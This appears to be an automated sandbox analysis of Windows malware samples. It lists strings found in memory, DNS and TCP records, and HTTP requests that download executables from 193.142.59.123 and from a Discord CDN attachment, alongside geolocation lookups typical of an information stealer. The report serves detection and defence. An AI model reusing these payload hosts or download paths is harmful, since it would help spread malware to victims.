Source: svchost.exe, 00000014.00000002.357402544.000001C441257000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.ps/certs
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: svchost.exe, 0000000A.00000002.508731338.000001294A845000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.508731338.000001294A845000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: 4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 0000000A.00000002.508731338.000001294A845000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: 4851.exe, 00000016.00000002.442859715.00000000029B0000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000003.425586737.0000000000DF0000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000000.481000106.0000000000982000.00000008.00020000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb4&m
Source: DB3B.exe, 0000001A.00000003.425586737.0000000000DF0000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: rnyuf.exe, 00000021.00000002.571555571.0000000006748000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org//k8FppT/index.php
Source: svchost.exe, 0000000A.00000002.508666006.000001294A82A000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: 4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 0000000A.00000002.508666006.000001294A82A000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000014.00000003.344839252.000001C4419B3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.344811977.000001C441982000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000014.00000003.344839252.000001C4419B3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.344811977.000001C441982000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000D.00000003.309243583.00000225C945E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000002.309778923.00000225C945A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000D.00000002.309728465.00000225C943D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000D.00000002.309778923.00000225C945A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000D.00000003.309201565.00000225C9449000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000D.00000002.309778923.00000225C945A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000D.00000002.309728465.00000225C943D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000D.00000003.309273013.00000225C9440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000D.00000003.309273013.00000225C9440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000D.00000003.309273013.00000225C9440000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000000D.00000003.309243583.00000225C945E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000D.00000002.309778923.00000225C945A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000D.00000002.309778923.00000225C945A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000D.00000003.309201565.00000225C9449000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.309243583.00000225C945E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000D.00000002.309728465.00000225C943D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000003.287574292.00000225C9432000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000014.00000003.344839252.000001C4419B3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.344811977.000001C441982000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000006.00000002.526948835.000002419484D000.00000004.00000001.sdmp	String found in binary or memory: https://fs.microsoft.c-k
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: DB3B.exe, 0000001A.00000003.425586737.0000000000DF0000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: 4851.exe, 00000016.00000002.445819677.0000000004711000.00000004.00000001.sdmp, 4851.exe, 00000016.00000002.445870206.0000000004715000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000014.00000003.338103638.000001C44199E000.00000004.00000001.sdmp	String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: svchost.exe, 0000000D.00000002.309728465.00000225C943D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000D.00000002.309676644.00000225C9413000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000D.00000003.309273013.00000225C9440000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000D.00000003.309273013.00000225C9440000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000D.00000003.287574292.00000225C9432000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000D.00000003.287574292.00000225C9432000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000D.00000003.309201565.00000225C9449000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: rnyuf.exe, 00000021.00000002.561790978.0000000006703000.00000004.00000001.sdmp, rnyuf.exe, 00000021.00000002.520694491.000000000419C000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudns.net/
Source: rnyuf.exe, 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudns.net/aff/id/562396/
Source: rnyuf.exe, 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudns.net/images/logo/logo-black-net-150x150.png
Source: 4851.exe, 00000016.00000002.460333405.0000000007BC0000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.553483787.0000000001E8D000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 00000014.00000003.344839252.000001C4419B3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.344811977.000001C441982000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000014.00000003.344839252.000001C4419B3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.344811977.000001C441982000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 00000014.00000003.339296968.000001C441982000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown

DNS traffic detected: queries for: clientconfig.passport.net

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Code function: 33_2_00406B90 InternetCloseHandle,Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,GetFileAttributesA,GetFileAttributesA,CreateDirectoryA,GetFileAttributesA,GetFileAttributesA,Sleep,Sleep,Sleep,GetFileAttributesA,CreateDirectoryA,GetFileAttributesA,CreateDirectoryA,std::_Xinvalid_argument,std::_Xinvalid_argument,GetFileAttributesA,CreateDirectoryA,GetFileAttributesA,CreateDirectoryA,std::_Xinvalid_argument,std::_Xinvalid_argument,Sleep,Sleep,

33_2_00406B90

Source: global traffic	HTTP traffic detected: GET /forum/docs/sefile.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.142.59.123
Source: global traffic	HTTP traffic detected: GET /forum/docs/kl8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.142.59.123
Source: global traffic	HTTP traffic detected: GET /forum/docs/sefile2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.142.59.123
Source: global traffic	HTTP traffic detected: GET /attachments/878382243242983437/879113244856430592/Microsoft.exe HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /forum/docs/sufile.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.142.59.123

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.142.59.123

Source: svchost.exe, 00000014.00000003.345710797.000001C441994000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-08-20T15:51:57.4849965Z\|\|.\|\|9d4d394a-7c6e-4ae1-ab64-fb8af7684136\|\|1152921505693802874\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000014.00000003.345710797.000001C441994000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-08-20T15:51:57.4849965Z\|\|.\|\|9d4d394a-7c6e-4ae1-ab64-fb8af7684136\|\|1152921505693802874\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000014.00000003.338103638.000001C44199E000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOpti